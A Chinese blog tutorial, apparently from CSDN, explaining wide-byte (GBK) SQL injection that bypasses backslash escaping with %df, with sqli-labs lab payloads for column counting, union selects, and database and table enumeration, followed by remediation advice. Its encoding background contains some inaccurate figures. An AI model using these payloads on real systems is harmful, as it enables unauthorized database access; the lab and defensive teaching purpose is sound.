sql注入——宽字节注入

最新推荐文章于 2024-04-14 19:24:54 发布
最新推荐文章于 2024-04-14 19:24:54 发布
阅读量259 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33441500/article/details/103041562
版权

 

sql注入——宽字节注入

一,宽字节的由来
一个字符其大小为一个字节那么我们称其为窄字节
那么大小为两个字节的我们称其为宽字节
所有的英文默认占一个字节
那么中文汉字默认占两个字节
例如 gb2312,GBK,GB18030,BIG5,Shift_JIS这些编码都是宽字节
英文a-zA-Z共四十八种
一个字节都是八位的二进制
那么数字的0,1组合起来就有255种但是英文只有48个那么基本应对就绰绰有余
但是我们中文汉字才止255个呢所以一个字节是不能满足我们中文汉字的编码需求
所以我们的中文,韩文,日文等都需要两个字节来表示(即16位二进制)
gbk就是双字节编码占用两个字节
UTF-8编码的一个汉字占用三个字节
二,宽字节注入的原理
1,宽字节注入主要来自程序员设置数据库编码为非英文编码就有可能产生宽字节注入
宽字节sql注入就是php发送请求mysql时使用了语句
SET names ‘gbk’ SET character_set_client=gbk
进行了依次gbk编码但是又由于一些不经意的字符集导致了宽字节注入
2,这个引入一个php防御函数
magic_quotes_gpc(魔术引号开关)
magic_quotes_gpc函数在php中的作用是判断用户输入的数据,在post,get,cookie传参中接收到的数据中加转义字符“\”,以确保这些数据不会引起程序出现致命性错误
单引号’ 双引号“ 反斜线\ null都会被加上反斜线来转义
3,magic_quotes_gpc的作用:
当php传参中有特殊字符就会在前面加转义字符\来做一定的过滤
4. 为了绕过magic_quotes_gpc的 \ ,于是开始引入宽字节。
\:编码%5c 運:编码%df%5c

三,sqli-lab靶场实战
1,用order by 排序判断字段数

?id=1%df%27%20and%201=2%20order%20by%203%23

2,使用联合查询寻找输出点

?id=-1%df%27%20and%201=2%20union%20select%201,2,3%23

在这里插入图片描述
3,查询数据

?id=-1%df%27%20and%201=2%20union%20select%201,database(),@@datadir%23

在这里插入图片描述
4,从自带库中查询库中表

?id=1%df%27%20and%201=2%20union%20select%201,2,group_concat(table_name)from%20information_schema.tables%20where%20table_schema=security%23

在这里插入图片描述

此处我们将security字符转换成16进制加上0x填入

?id=1%df%27%20and%201=2%20union%20select%201,2,group_concat(table_name)from%20information_schema.tables%20where%20table_schema=0x7365637572697479%23

在这里插入图片描述
四,如何修复
1,使用UTF-8编码格式,避免宽字节注入
ps:不仅在gbk,韩文,日文等等都是宽字节,都可能存在宽字节注入漏洞。
2,mysql_real_escape_string,mysql_set_charset(‘gbk’,$conn);针对查询语句直接加入过滤
3,可以设置参数,character_set_client=binary

 

-stem-
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
字节注入详解
qq_45927819的博客
03-26 1万+
文章目录1、涉及函数2、原理分析3、实战南邮nctf-sql injection 3sql-labs-32关 1、涉及函数 addslashes() 函数返回在预定义字符之前添加反斜杠的字符串 mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符 mysql_escape_string() 转义一个字符串 2、原理分析 先了解一下什么是窄、字节已经常见字节编码: 当某字符的大小为一个字节时,称其字符为窄字节. 当某字符的大小为两个字节时,称
SQL注入字节注入、堆叠注入、二次注入
m0_61506558的博客
09-17 1153
渗透的学习,必须要心无旁骛,通过靶场实战不断总结经验,vulnhub、hackthebox......这些靶场,如果有一个知识点没有掌握就会卡着动不了,之前整理sql注入的文章有点杂,主要原因是此部分内容较多。(一)字节注入如今有很多人在编码的时候,大多数人对程序的编码都使用unicode编码,网站都使用utf-8来一个统一国际规范。但仍然有很多,包括国内及国外(特别是非英语国家)的一些cms,仍然使用着自己国家的一套编码,比如gbk,作为自己默认的编码类型。
SQL注入——字节注入
weixin_74991270的博客
10-10 461
1.转义符“\”有些符号想让他当作单纯的字符,而不是当作符号的时候,一般可以用: \符号比如:\’ \\’   这种情况下,‘和"将被当作正常的字符在数据库之中’与"几乎没有区别,在php之中 ’ 包括的内容完全当作字符串,而 " 包括的内容会进一步进行解析例如:$a=‘hello’;echo ‘$a’;//输出:aecho “$a”;//输出:hello2.为什么产生编码:--为了处理英文字符,产生了ASCII码。
字节注入
硫酸超的博客
08-07 5326
字节注入函数介绍字符集MySQL字符转换字节注入普通注入字节get注入字节get注入2.0字节post注入2.0字节注入防御 函数介绍 PHP mysql_real_escape_string() 函数 PHP addslashes() 函数 字符集 在了解字节注入之前,我们先来看一看字符集是什么。字符集也叫字符编码,是一种将符号转换为二进制数的映射关系。 几种常见的字符集: ASCII编码:单字节编码 0x00 null 0x20 0x21 ! 0x22 " 0x23 # 0x24 $ 0x
SQL注入-09】字节注入案例—以sqli-labs-less32为例
m0_64378913的博客
05-01 2487
符号 GBK编码 ’ 27
SQL注入--字节注入
weixin_44940180的博客
08-04 738
什么是字节 当某字符的大小为一个字节时,称其字符为窄字节 当某字符的大小为两个字节时,称其字符为字节 所有英文默认占一个字节,汉字占两个字节 常见的字节编码:GB2312,GBK,GB18030,BIG5,Shift_JIS等等 使用字节注入的前提 数据库使用了gbk编码 使用了过滤函数,将用户输入的单引号转义(mysql_real_escape_string,addslashes) 这样被处理后的sql语句中,单引号不再具有‘作用’,仅仅是‘内容’而已,换句话说,这个单引号无法发挥和前后单引号
【基础篇】第01篇:PHP代码审计笔记--SQL注入1
08-03
【PHP代码审计笔记——SQL注入1】主要探讨的是在PHP环境中如何防止SQL注入攻击,特别是针对MySQL数据库。SQL注入是一种常见的网络安全威胁,攻击者通过构造恶意的SQL语句,利用程序漏洞来执行非授权的操作,如获取...
Web编程入门——字节跳动.zip
10-25
除此之外,Web安全知识也不容忽视,如防止SQL注入、XSS跨站脚本攻击和CSRF跨站请求伪造等。此外,了解如何使用HTTPS进行加密通信,保护用户隐私和数据安全,也是现代Web开发者的必备技能。 最后,持续集成/持续部署...
第六届字节跳动青训营——后端进阶班.zip
05-01
5. **安全性实践**: 安全是后端开发的重要一环,学员可能学习到身份验证、授权、防止SQL注入、XSS攻击、CSRF防护等安全策略。 6. **分布式系统**: 分布式系统设计和原理,包括CAP理论、一致性哈希、分布式锁和消息...
Java综合实践——学生成绩查询系统
10-14
4. **Spring框架**:Spring是Java企业级应用开发的重要框架,它提供了依赖注入(DI)和面向切面编程(AOP)等功能,简化了项目的开发和管理。在学生成绩查询系统中,Spring可以用来管理Bean,处理HTTP请求,以及执行事务...
sqli-labs实验环境
05-08
`sqli-labs`是一个专门用于学习和实践SQL注入的实验环境,它提供了多种类型的SQL注入漏洞场景,包括但不限于盲注、时间延迟注入字节注入、联合查询注入等。通过这些实验,初学者可以深入了解SQL注入的原理,掌握...
sql注入字节注入详解
Yuppie001的博客
04-14 763
1.什么是字节?2.字节注入原理二.sqli-labs-36关。
SQL注入实战:字节注入
ting_liang的博客
01-21 1004
2、数据库使用的是GBK编码,PHP编码为UTF8就可能出现字节注入,原因是为了防止发生SQL注入,会调用上面所介绍的几种函数,将单引号或双引号转义操作,在单或双引号前加斜杠(\)。1、%DF':会被PHP当中的addslashes函数转义为“%DF\’",\在URL里是“%5C”,那么也就是说,“%DF'"会被转成“%DF%5C%27,倘若网站的字符集是GBK,MYSOL使用的编码也是GBK的话,就会认为“%DF%5C%27"是一个字符。addslashes()函数。二、php中的字节
渗透测试-SQL注入字节注入
lza20001103的博客
04-20 8528
渗透测试-SQL注入字节注入
【漏洞挖掘】——22、DDE漏洞攻击介绍
Fly_鹏程万里
03-03 1301
2017年10月SensePost发布了一篇文章并在其中解释了如何在不使用任何宏或脚本的情况下从Microsoft Word文档中执行任意代码,SensePost描述的技术是利用合法的Microsoft Office功能,该功能称为DDE(动态数据交换),DDE旨在允许Microsoft办公应用程序之间传输数据,由于此技术不会使用电子邮件网关可以检测到的恶意宏感染Word文档,因此可以实现与远程代码执行相同的结果,这种攻击非常有效且被广泛用于恶意软件活动和红队评估。
SQL注入字节注入
金色%夕阳的博客
08-12 527
SQL注入字节注入 字节注入涉及的函数 什么是字节 字节注入的条件 字节注入的方式 案例分析
使用 JavaScript 编写的记忆游戏(附源代码).zip
最新发布
07-22
使用 JavaScript 编写的记忆游戏(附源代码)   项目:JavaScript 记忆游戏(附源代码) 记忆检查游戏是一个使用 HTML5、CSS 和 JavaScript 开发的简单项目。这个游戏是关于测试你的短期 记忆技能。玩这个游戏 时,一系列图像会出现在一个盒子形状的区域中 。玩家必须找到两个相同的图像并单击它们以使它们消失。 如何运行游戏? 记忆游戏项目仅包含 HTML、CSS 和 JavaScript。谈到此游戏的功能,用户必须单击两个相同的图像才能使它们消失。 点击卡片或按下键盘键,通过 2 乘 2 旋转来重建鸟儿对,并发现隐藏在下面的图像! 如果翻开的牌面相同(一对),您就赢了,并且该对牌将从游戏中消失! 否则,卡片会自动翻面朝下,您需要重新尝试! 该游戏包含大量的 javascript 以确保游戏正常运行。 如何运行该项目? 要运行此游戏,您不需要任何类型的本地服务器,但需要浏览器。我们建议您使用现代浏览器,如 Google Chrome 和 Mozilla Firefox, 以获得更好、更优化的游戏体验。要玩游戏,首先,通过单击 memorygame-index.html 文件在浏览器中打开游戏。 演示: 该项目为国外大神项目,可以作为毕业设计的项目,也可以作为大作业项目,不用担心代码重复,设计重复等,如果需要对项目进行修改,需要具备一定基础知识。 注意:如果装有360等杀毒软件,可能会出现误报的情况,源码本身并无病毒,使用源码时可以关闭360,或者添加信任。
sql注入字节注入
07-28
SQL注入字节注入都是常见的安全漏洞类型。下面我将简要介绍这两种注入方式。 1. SQL注入SQL注入是一种在应用程序中利用不正确处理用户输入的漏洞,攻击者可以通过在用户输入中插入恶意的SQL代码来执行非授权...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值